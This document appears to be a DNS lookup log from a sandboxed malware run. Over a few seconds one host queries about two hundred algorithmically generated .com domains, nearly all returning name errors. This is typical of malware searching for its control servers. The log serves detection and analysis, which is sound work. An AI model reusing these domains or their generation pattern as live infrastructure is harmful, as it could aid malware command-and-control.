Nov 11, 2024 18:13:43.963531971 CET	1.1.1.1	192.168.2.6	0x5edb	Name error (3)	vofygaf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.963562012 CET	1.1.1.1	192.168.2.6	0xe72e	Name error (3)	gahyqub.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.963890076 CET	1.1.1.1	192.168.2.6	0xb70b	Name error (3)	qetyfop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.964788914 CET	1.1.1.1	192.168.2.6	0x7bf0	Name error (3)	lyvyxyj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.966279030 CET	1.1.1.1	192.168.2.6	0xf08c	Name error (3)	vojyquf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.973361969 CET	1.1.1.1	192.168.2.6	0x7793	Name error (3)	gadyneh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.980148077 CET	1.1.1.1	192.168.2.6	0x508f	Name error (3)	pufymyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.980161905 CET	1.1.1.1	192.168.2.6	0xa703	Name error (3)	qeqysuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.980915070 CET	1.1.1.1	192.168.2.6	0x232c	Name error (3)	gatyfaz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.982428074 CET	1.1.1.1	192.168.2.6	0x11d5	Name error (3)	vowydic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.984638929 CET	1.1.1.1	192.168.2.6	0x7e0a	Name error (3)	gadyfob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.985307932 CET	1.1.1.1	192.168.2.6	0x8c31	Name error (3)	pumyxep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.985526085 CET	1.1.1.1	192.168.2.6	0x5890	Name error (3)	volyquk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.988019943 CET	1.1.1.1	192.168.2.6	0xb28e	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.988579035 CET	1.1.1.1	192.168.2.6	0x182f	Name error (3)	qedynaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.989623070 CET	1.1.1.1	192.168.2.6	0xc4b4	Name error (3)	lygymyn.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.989937067 CET	1.1.1.1	192.168.2.6	0x6ca9	Name error (3)	vonyzac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.989948988 CET	1.1.1.1	192.168.2.6	0xadce	Name error (3)	lyxylor.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.990487099 CET	1.1.1.1	192.168.2.6	0xfe20	Name error (3)	qegyhev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:43.990745068 CET	1.1.1.1	192.168.2.6	0xe3e3	Name error (3)	lyxywij.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.001445055 CET	1.1.1.1	192.168.2.6	0x1bac	Name error (3)	puvyxeq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.002919912 CET	1.1.1.1	192.168.2.6	0xb096	Name error (3)	lysynaj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.003391981 CET	1.1.1.1	192.168.2.6	0xf887	Name error (3)	qexylal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.003797054 CET	1.1.1.1	192.168.2.6	0x384e	Name error (3)	qeqyxyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.005625010 CET	1.1.1.1	192.168.2.6	0x2abc	Name error (3)	vonyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.010508060 CET	1.1.1.1	192.168.2.6	0x309a	Name error (3)	lymyxex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.019810915 CET	1.1.1.1	192.168.2.6	0xe9bd	Name error (3)	pufygav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.022273064 CET	1.1.1.1	192.168.2.6	0x8528	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.024712086 CET	1.1.1.1	192.168.2.6	0x260	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.032898903 CET	1.1.1.1	192.168.2.6	0x820b	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.096927881 CET	1.1.1.1	192.168.2.6	0xd379	Server failure (2)	lysyfyj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.402865887 CET	1.1.1.1	192.168.2.6	0x96d	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.406196117 CET	1.1.1.1	192.168.2.6	0x1ab9	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.410715103 CET	1.1.1.1	192.168.2.6	0x9db1	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.425667048 CET	1.1.1.1	192.168.2.6	0xf074	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.444657087 CET	1.1.1.1	192.168.2.6	0xa346	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.445596933 CET	1.1.1.1	192.168.2.6	0xf597	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.447351933 CET	1.1.1.1	192.168.2.6	0x5863	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.449670076 CET	1.1.1.1	192.168.2.6	0xa417	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.450845003 CET	1.1.1.1	192.168.2.6	0x35e5	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.451075077 CET	1.1.1.1	192.168.2.6	0xbf7e	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.468898058 CET	1.1.1.1	192.168.2.6	0x7f84	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.469935894 CET	1.1.1.1	192.168.2.6	0x988e	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.469948053 CET	1.1.1.1	192.168.2.6	0xf6d9	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.470312119 CET	1.1.1.1	192.168.2.6	0x6abe	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.471225023 CET	1.1.1.1	192.168.2.6	0x8122	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.492656946 CET	1.1.1.1	192.168.2.6	0x1802	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.494788885 CET	1.1.1.1	192.168.2.6	0x3c04	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.499347925 CET	1.1.1.1	192.168.2.6	0x1b4a	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.501336098 CET	1.1.1.1	192.168.2.6	0xd068	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.501987934 CET	1.1.1.1	192.168.2.6	0x992	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.501997948 CET	1.1.1.1	192.168.2.6	0x302e	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.507428885 CET	1.1.1.1	192.168.2.6	0x919b	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.513289928 CET	1.1.1.1	192.168.2.6	0xab6c	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.521368027 CET	1.1.1.1	192.168.2.6	0x5db5	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.521724939 CET	1.1.1.1	192.168.2.6	0x468e	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.533029079 CET	1.1.1.1	192.168.2.6	0xe107	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.534112930 CET	1.1.1.1	192.168.2.6	0xc90a	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.578123093 CET	1.1.1.1	192.168.2.6	0x4797	Name error (3)	lymylij.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.584014893 CET	1.1.1.1	192.168.2.6	0xa126	Name error (3)	pufydul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.585975885 CET	1.1.1.1	192.168.2.6	0x3a33	Name error (3)	lyxymed.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.586514950 CET	1.1.1.1	192.168.2.6	0xf44b	Name error (3)	gadyduz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.592135906 CET	1.1.1.1	192.168.2.6	0xd0cc	Name error (3)	vowyzam.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.612915039 CET	1.1.1.1	192.168.2.6	0x26ae	Name error (3)	qeqyloq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.613485098 CET	1.1.1.1	192.168.2.6	0xea04	Name error (3)	qegyfil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.631278038 CET	1.1.1.1	192.168.2.6	0x9ad4	Name error (3)	gahyfow.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.636698008 CET	1.1.1.1	192.168.2.6	0xf948	Name error (3)	puzymev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.698116064 CET	1.1.1.1	192.168.2.6	0x93ce	Name error (3)	lyryxen.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.862513065 CET	1.1.1.1	192.168.2.6	0xfe0c	Name error (3)	qebylov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.864012957 CET	1.1.1.1	192.168.2.6	0xa529	Name error (3)	qebyrip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.864315987 CET	1.1.1.1	192.168.2.6	0x1fd0	Name error (3)	puvyliv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.864326000 CET	1.1.1.1	192.168.2.6	0xd341	Name error (3)	gaqypew.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.865515947 CET	1.1.1.1	192.168.2.6	0xa6fc	Name error (3)	puzyjyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.865667105 CET	1.1.1.1	192.168.2.6	0x842b	Name error (3)	lygyfir.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.865678072 CET	1.1.1.1	192.168.2.6	0x9bbd	Name error (3)	vocyquc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.866024017 CET	1.1.1.1	192.168.2.6	0x717	Name error (3)	vocykif.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.866431952 CET	1.1.1.1	192.168.2.6	0xbc61	Name error (3)	vojygok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.866442919 CET	1.1.1.1	192.168.2.6	0xf2c0	Name error (3)	lyvywux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.867695093 CET	1.1.1.1	192.168.2.6	0x8089	Name error (3)	vowypek.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.868107080 CET	1.1.1.1	192.168.2.6	0x3c7	Name error (3)	vojymet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.868118048 CET	1.1.1.1	192.168.2.6	0x3a0d	Name error (3)	gatyduh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.872819901 CET	1.1.1.1	192.168.2.6	0x896e	Name error (3)	gatycyb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.873841047 CET	1.1.1.1	192.168.2.6	0x952e	Name error (3)	qeqytal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.880656004 CET	1.1.1.1	192.168.2.6	0x1a7c	Name error (3)	qexyqyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.880669117 CET	1.1.1.1	192.168.2.6	0x49af	Name error (3)	qetysuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.881808996 CET	1.1.1.1	192.168.2.6	0xc682	Name error (3)	qekyheq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.885550022 CET	1.1.1.1	192.168.2.6	0xbe3f	Name error (3)	gahynaz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.886050940 CET	1.1.1.1	192.168.2.6	0x1f2c	Name error (3)	qedyvuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.886358023 CET	1.1.1.1	192.168.2.6	0xf005	Name error (3)	vonyrot.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.889708042 CET	1.1.1.1	192.168.2.6	0x4c81	Name error (3)	pujygaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.893495083 CET	1.1.1.1	192.168.2.6	0xf4a3	Name error (3)	lymytar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.899624109 CET	1.1.1.1	192.168.2.6	0x3eb8	Name error (3)	pufybop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.899635077 CET	1.1.1.1	192.168.2.6	0x82d3	Name error (3)	ganyzas.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.900820971 CET	1.1.1.1	192.168.2.6	0xa5ce	Name error (3)	volyjym.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.901978016 CET	1.1.1.1	192.168.2.6	0x56ff	Name error (3)	gacykub.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.904268980 CET	1.1.1.1	192.168.2.6	0x10	Name error (3)	pujymel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.905030966 CET	1.1.1.1	192.168.2.6	0x55db	Name error (3)	qegynap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.919514894 CET	1.1.1.1	192.168.2.6	0xbddb	Name error (3)	gadyvis.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.919526100 CET	1.1.1.1	192.168.2.6	0x2cf6	Name error (3)	vofydut.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.920507908 CET	1.1.1.1	192.168.2.6	0xcd65	Name error (3)	lyrysyj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.920819044 CET	1.1.1.1	192.168.2.6	0x1e33	Name error (3)	lyvylod.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.922192097 CET	1.1.1.1	192.168.2.6	0x1fa2	Name error (3)	galyheh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.923998117 CET	1.1.1.1	192.168.2.6	0xfa61	Name error (3)	pumytol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.924556971 CET	1.1.1.1	192.168.2.6	0xed5d	Name error (3)	pupydig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.930433035 CET	1.1.1.1	192.168.2.6	0x5ac3	Name error (3)	lysyvud.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.937715054 CET	1.1.1.1	192.168.2.6	0x70a1	Name error (3)	qekyqyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.939111948 CET	1.1.1.1	192.168.2.6	0x66b2	Name error (3)	lykymyr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.941715956 CET	1.1.1.1	192.168.2.6	0x58ce	Name error (3)	vopydum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.941797018 CET	1.1.1.1	192.168.2.6	0x31d	Name error (3)	qexykug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.942154884 CET	1.1.1.1	192.168.2.6	0xcf63	Name error (3)	purypyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.942416906 CET	1.1.1.1	192.168.2.6	0xf23d	Name error (3)	pupycuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.949261904 CET	1.1.1.1	192.168.2.6	0x5125	Name error (3)	lykygaj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.951872110 CET	1.1.1.1	192.168.2.6	0xd838	Name error (3)	lyxyjun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.953162909 CET	1.1.1.1	192.168.2.6	0x854a	Name error (3)	ganyriz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.959599018 CET	1.1.1.1	192.168.2.6	0x633e	Name error (3)	gacyqys.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.959647894 CET	1.1.1.1	192.168.2.6	0xba2d	Name error (3)	puvywup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.960216999 CET	1.1.1.1	192.168.2.6	0x6287	Name error (3)	gaqyzoh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.960969925 CET	1.1.1.1	192.168.2.6	0xa15f	Name error (3)	qetyxeg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:44.961962938 CET	1.1.1.1	192.168.2.6	0xbdf6	Name error (3)	vofybic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:45.156430006 CET	1.1.1.1	192.168.2.6	0xb00	Name error (3)	vopycyf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:45.374787092 CET	1.1.1.1	192.168.2.6	0x1bb0	Name error (3)	puryxag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:45.851737022 CET	1.1.1.1	192.168.2.6	0x435b	Name error (3)	lygynox.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:46.134852886 CET	1.1.1.1	192.168.2.6	0x2110	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:46.136838913 CET	1.1.1.1	192.168.2.6	0xcb28	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:46.139708042 CET	1.1.1.1	192.168.2.6	0xab32	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:46.142324924 CET	1.1.1.1	192.168.2.6	0xf2	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:46.147160053 CET	1.1.1.1	192.168.2.6	0x44ef	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:46.158953905 CET	1.1.1.1	192.168.2.6	0x6619	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:46.165332079 CET	1.1.1.1	192.168.2.6	0x3410	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.060129881 CET	1.1.1.1	192.168.2.6	0x4f2f	Name error (3)	pumyliq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.069175005 CET	1.1.1.1	192.168.2.6	0x595c	Name error (3)	vocyjet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.072698116 CET	1.1.1.1	192.168.2.6	0xaf83	Name error (3)	ganykuw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.072896004 CET	1.1.1.1	192.168.2.6	0x97da	Name error (3)	qetytav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.075527906 CET	1.1.1.1	192.168.2.6	0x6d40	Name error (3)	qedysyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.091850042 CET	1.1.1.1	192.168.2.6	0xb49e	Name error (3)	galynab.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.092776060 CET	1.1.1.1	192.168.2.6	0x6ad8	Name error (3)	qekynog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.114089012 CET	1.1.1.1	192.168.2.6	0x362a	Name error (3)	volymaf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.116621017 CET	1.1.1.1	192.168.2.6	0x3c32	Name error (3)	gahyvuh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.119843960 CET	1.1.1.1	192.168.2.6	0x45bf	Name error (3)	puvyjyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.132958889 CET	1.1.1.1	192.168.2.6	0x42db	Name error (3)	lykynon.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.181145906 CET	1.1.1.1	192.168.2.6	0x1021	Name error (3)	pujybig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.193080902 CET	1.1.1.1	192.168.2.6	0xc9db	Name error (3)	lysysyx.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.193099976 CET	1.1.1.1	192.168.2.6	0x863	Name error (3)	vonykuk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.193696022 CET	1.1.1.1	192.168.2.6	0x2322	Name error (3)	lyvyjyr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.198641062 CET	1.1.1.1	192.168.2.6	0x7861	Name error (3)	vojybim.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.199346066 CET	1.1.1.1	192.168.2.6	0x90ac	Name error (3)	qebykul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.206362963 CET	1.1.1.1	192.168.2.6	0x9aee	Name error (3)	gatypas.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.247561932 CET	1.1.1.1	192.168.2.6	0x24cc	Name error (3)	qexynol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.247759104 CET	1.1.1.1	192.168.2.6	0x1565	Name error (3)	lyrytod.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.250853062 CET	1.1.1.1	192.168.2.6	0x9b22	Name error (3)	pufypeg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.289155006 CET	1.1.1.1	192.168.2.6	0xa754	Name error (3)	vowykuc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.291385889 CET	1.1.1.1	192.168.2.6	0xcbb2	Name error (3)	pupypep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.292546988 CET	1.1.1.1	192.168.2.6	0xd779	Name error (3)	lygysen.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.297719955 CET	1.1.1.1	192.168.2.6	0x702b	Name error (3)	qegyvuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.299180984 CET	1.1.1.1	192.168.2.6	0x430a	Name error (3)	puvymaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.300988913 CET	1.1.1.1	192.168.2.6	0x8693	Name error (3)	purytov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.302313089 CET	1.1.1.1	192.168.2.6	0x137b	Name error (3)	gaqykus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.313442945 CET	1.1.1.1	192.168.2.6	0x3616	Name error (3)	gacyhez.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.341681957 CET	1.1.1.1	192.168.2.6	0x477	Name error (3)	gacynow.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.394375086 CET	1.1.1.1	192.168.2.6	0x900f	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.413072109 CET	1.1.1.1	192.168.2.6	0xb0f2	Name error (3)	purylup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.448771954 CET	1.1.1.1	192.168.2.6	0xfe66	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.450613976 CET	1.1.1.1	192.168.2.6	0x1dd9	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.543826103 CET	1.1.1.1	192.168.2.6	0x8630	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.643300056 CET	1.1.1.1	192.168.2.6	0x38e7	Name error (3)	qekyfiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.722753048 CET	1.1.1.1	192.168.2.6	0x42eb	Name error (3)	galyfis.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.793243885 CET	1.1.1.1	192.168.2.6	0xd6be	Name error (3)	vonyqym.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.796364069 CET	1.1.1.1	192.168.2.6	0x13eb	Name error (3)	gahydyb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.798693895 CET	1.1.1.1	192.168.2.6	0x2199	Name error (3)	qeqyrug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.798965931 CET	1.1.1.1	192.168.2.6	0x3713	Name error (3)	pufycyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.799657106 CET	1.1.1.1	192.168.2.6	0x899c	Name error (3)	gaqyrib.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.801135063 CET	1.1.1.1	192.168.2.6	0xf176	Name error (3)	qexyhap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.801567078 CET	1.1.1.1	192.168.2.6	0x4256	Name error (3)	lymywun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.803359032 CET	1.1.1.1	192.168.2.6	0x744c	Name error (3)	gadycew.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.803369999 CET	1.1.1.1	192.168.2.6	0xb2da	Name error (3)	lysyxar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.812424898 CET	1.1.1.1	192.168.2.6	0xce1d	Name error (3)	volygoc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.817826033 CET	1.1.1.1	192.168.2.6	0xa13b	Name error (3)	qedyxel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.817867994 CET	1.1.1.1	192.168.2.6	0xdfd2	Name error (3)	lyvymej.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.817888975 CET	1.1.1.1	192.168.2.6	0xf202	Name error (3)	lyxygax.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.820594072 CET	1.1.1.1	192.168.2.6	0x9a7c	Name error (3)	vowyrif.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.823286057 CET	1.1.1.1	192.168.2.6	0xecc7	Name error (3)	pupyxal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.823816061 CET	1.1.1.1	192.168.2.6	0xbdf8	Name error (3)	puzygop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:47.824433088 CET	1.1.1.1	192.168.2.6	0x743e	Name error (3)	vofycyk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:48.077514887 CET	1.1.1.1	192.168.2.6	0x1876	Name error (3)	ganyqyh.com	none	none	A (IP address)	IN (0x0001)	false
